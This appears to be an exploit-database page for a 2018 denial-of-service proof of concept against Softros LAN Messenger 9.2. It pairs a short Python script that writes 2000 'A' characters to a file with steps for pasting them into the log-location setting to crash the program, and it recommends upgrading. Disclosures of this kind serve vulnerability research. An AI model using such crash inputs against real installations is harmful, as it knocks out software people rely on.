header-logo
Suggest Exploit
vendor:
Softros LAN Messenger
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Softros LAN Messenger
Affected Version From: 9.2
Affected Version To: 9.2
Patch Exists: YES
Related CWE: N/A
CPE: a:softros_systems:softros_lan_messenger
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1
2018

Softros LAN Messenger 9.2 – Denial of Service (PoC)

Softros LAN Messenger 9.2 is vulnerable to Denial of Service attack when a maliciously crafted file is used as a custom log file location. An attacker can exploit this vulnerability by running a python code to create a malicious file, copying its content to clipboard, selecting a custom log file location in Softros LAN Messenger and pasting the clipboard content. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of Softros LAN Messenger
Source

Exploit-DB raw data:

# Exploit Title: Softros LAN Messenger 9.2 - Denial of Service (PoC)
# Discovery by: Victor Mondragón
# Discovery Date: 2018-11-02
# Vendor Homepage: https://messenger.softros.com/
# Software Link: https://messenger.softros.com/downloads/
# Tested Version: 9.2
# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1

# Steps to produce the crash:
# 1.- Run python code: Softros_LAN_Messenger_v9.2.py
# 2.- Open msn.txt and copy content to clipboard
# 2.- Open Softros LAN Messenger
# 3.- Select "Logging"
#  4.- Locate "Log Files Location " 
# 5.- Select "Custom Location" and Paste ClipBoard
# 6.- Click on "OK"
# 7.- Crashed

cod = "\x41" * 2000

f = open('msn.txt', 'w')
f.write(cod)
f.close()